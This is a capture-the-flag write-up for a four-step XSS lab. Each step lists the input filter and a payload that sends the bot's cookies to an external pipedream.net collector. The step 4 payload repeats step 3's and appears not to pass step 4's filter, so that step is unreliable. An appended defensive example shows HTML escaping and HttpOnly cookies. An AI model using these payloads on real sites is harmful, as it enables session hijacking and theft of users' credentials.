This challenge is divided into four steps.
Step 1:
XSS ME 1/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
For the first step, the payload is not filtered.
Payload:
<script>fetch("https://eosbpqxq8zqclnd.m.pipedream.net?c="+document.cookie)</script>
New link for Step 2:
https://nopsctf-xss-lab.chals.io/0d566d04bbc014c2d1d0902ad50a4122
Step 2:
XSS ME 2/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
You have to bypass this filter:
import re

def filter_2(payload):
    # Denylist terms: "script" or a closing tag (</...>)
    regex = r".*(script|(</.*>)).*"
    if re.match(regex, payload):
        return "Nope"
    return payload
Payload:
<img src="/sfmqsjfmlkqdsfjmldsqkfjmsldkfj.png"
onerror="var i=new Image();i.src='https://eosbpqxq8zqclnd.m.pipedream.net?c='+encodeURIComponent(document.cookie);">
New link for Step 3:
https://nopsctf-xss-lab.chals.io/5d1aaeadf1b52b4f2ab7042f3319a267
Step 3:
XSS ME 3/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
You have to bypass this filter:
import re

def filter_3(payload):
    # Denylist terms: "://", "script", a closing tag, or an inline handler (on...=)
    regex = r".*(://|script|(</.*>)|(on\w+\s*=)).*"
    if re.match(regex, payload):
        return "Nope"
    return payload
Payload:
<iframe src=jaVascript:top.location='//eosbpqxq8zqclnd.m.pipedream.net/?c='+document.cookie>
New link for Step 4:
https://nopsctf-xss-lab.chals.io/b355082fc794c4d1d2b6c02e04163090
Step 4:
XSS ME 4/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
You have to bypass this filter:
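import re

def filter_4(payload):
    # Denylist terms: "/", script, closing tags, document, cookie, eval, string,
    # nested quoted strings (first group, case-insensitive); on...=, "+" and "!"
    regex = r"(?i:(.*(/|script|(</.*>)|document|cookie|eval|string|(\"|'|`).*(('.+')|(\".+\")|(`.+`)).*(\"|'|`)).*))|(on\w+\s*=)|\+|!"
    if re.match(regex, payload):
        return "Nope"
    return payload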
Payload:
<iframe src=jaVascript:top.location='//eosbpqxq8zqclnd.m.pipedream.net/?c='+document.cookie>
And you get the flag in the cookie.
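Every filter in this lab is a denylist applied to the input before it is shown to the bot. The following added example (not part of the original write-up or the challenge source) contrasts filter_2 with the defensive fix: HTML-encoding on output plus an HttpOnly session cookie. The render functions, the collector.example host and the cookie name are assumptions made for illustration.

```python
import html
import re
from http.cookies import SimpleCookie

# filter_2 as given in the challenge (behaviour unchanged).
def filter_2(payload):
    regex = r".*(script|(</.*>)).*"
    if re.match(regex, payload):
        return "Nope"
    return payload

# Payload shapes from steps 1 and 2; collector.example is a placeholder host.
STEP1 = '<script>fetch("https://collector.example?c="+document.cookie)</script>'
STEP2 = ('<img src="/missing.png" onerror="var i=new Image();'
         "i.src='https://collector.example?c='+encodeURIComponent(document.cookie);\">")

def render_unsafe(payload):
    """Assumed lab behaviour: denylist, then raw interpolation into HTML."""
    return "<div>" + filter_2(payload) + "</div>"

def render_encoded(payload):
    """Hardened form: no denylist, encode for the HTML context on output."""
    return "<div>" + html.escape(payload, quote=True) + "</div>"

def session_cookie_header(value):
    """Session cookie that page script cannot read through document.cookie."""
    c = SimpleCookie()
    c["session"] = value  # "session" is a hypothetical cookie name
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Strict"
    return c["session"].OutputString()

if __name__ == "__main__":
    for name, p in (("step 1", STEP1), ("step 2", STEP2)):
        print(name, "| denylist:", render_unsafe(p))
        print(name, "| encoded: ", render_encoded(p))
    print("Set-Cookie:", session_cookie_header("constructed-sample-value"))
```

The denylist stops the step 1 payload but returns the step 2 payload untouched, while the encoded rendering turns both into inert text; HttpOnly removes the cookie from script reach even if markup does get through.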